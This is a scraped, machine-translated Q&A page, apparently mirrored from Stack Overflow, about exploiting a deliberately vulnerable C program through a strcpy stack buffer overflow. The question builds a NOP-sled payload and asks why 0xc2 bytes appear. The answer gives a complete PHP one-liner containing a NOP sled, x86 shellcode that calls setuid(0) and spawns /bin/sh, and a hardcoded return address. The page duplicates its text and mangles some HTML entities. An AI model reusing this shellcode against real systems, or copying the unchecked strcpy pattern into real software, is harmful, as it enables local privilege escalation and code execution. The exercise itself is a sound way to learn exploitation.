你的堆栈为什么会充满了0xc2指令,当我传递了0x90指令?

huangapple go评论67阅读模式
英文:

Why is my stack filled with 0xc2 instructions when I passed the 0x90 instruction?

问题

I have a C program to exploit buffer overflow

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int overflow(char *input) {
  char buf[256];
  strcpy(buf, input);
  return 1;
}

int main(int argc, char *argv[]) {
  overflow(argv[1]);
  printf("meow =^..^=\n");
  return 1;
}

I try to fill my stack with 0x90 instructions. For that, I use the following command and inspect with GDB:

./vuln $(python -c 'print ("\x41" * (272 - 96 - 74 - 4) + "\x90" * 96 + "\x44" * 74 + "\x42" * 4)')
0xffffd1cc: 0x41 0x41 0x41 0x41 0x41 0xc2 0x90 0xc2
0xffffd1d4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1dc: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1e4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1ec: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1f4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2

Is this protection? If so, is there any way to bypass it? If not, what would it be?

Thanks for all the help.

英文:

I have a C program to exploit buffer overflow

#include &lt;stdlib.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int overflow(char *input) {
  char buf[256];
  strcpy(buf, input);
  return 1;
}

int main(int argc, char *argv[]) {
  overflow(argv[1]);
  printf(&quot;meow =^..^=\n&quot;);
  return 1;
}

I try to fill my stack with 0x90 instructions. For that, I use the following command and inspect with GDB:

./vuln $(python -c &#39;print (&quot;\x41&quot; * (272 - 96 - 74 - 4) + &quot;\x90&quot; * 96 + &quot;\x44&quot; * 74 + &quot;\x42&quot; * 4)&#39;)
0xffffd1cc:	0x41	0x41	0x41	0x41	0x41	0xc2	0x90	0xc2
0xffffd1d4:	0x90	0xc2	0x90	0xc2	0x90	0xc2	0x90	0xc2
0xffffd1dc:	0x90	0xc2	0x90	0xc2	0x90	0xc2	0x90	0xc2
0xffffd1e4:	0x90	0xc2	0x90	0xc2	0x90	0xc2	0x90	0xc2
0xffffd1ec:	0x90	0xc2	0x90	0xc2	0x90	0xc2	0x90	0xc2
0xffffd1f4:	0x90	0xc2	0x90	0xc2	0x90	0xc2	0x90	0xc2

As you can see, the stack receives the 0xc2 instruction interspersed with 0x90 (the only one I requested). I believe this comes from some protection, but I'm not sure.

Is this protection? If so, is there any way to bypass it? If not, what would it be?

Thanks for all the help.

答案1

得分: 0

The problem was how Python handled hex, I found an alternative by switching to PHP. Here is the implemented code:

./vuln $(php -r 'echo str_repeat("\x41", 179). str_repeat("\x90", 56) . "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" . "\xc0\xd3\xff\xff";')
英文:

The problem was how Python handled hex, I found an alternative by switching to PHP. Here is the implemented code:

./vuln $(php -r &#39;echo str_repeat(&quot;\x41&quot;, 179). str_repeat(&quot;\x90&quot;, 56) . &quot;\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80&quot; . &quot;\xc0\xd3\xff\xff&quot;;&#39;)

huangapple
  • 本文由 发表于 2023年4月6日 23:13:48
  • 转载请务必保留本文链接:https://go.coder-hub.com/75951107.html
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

确定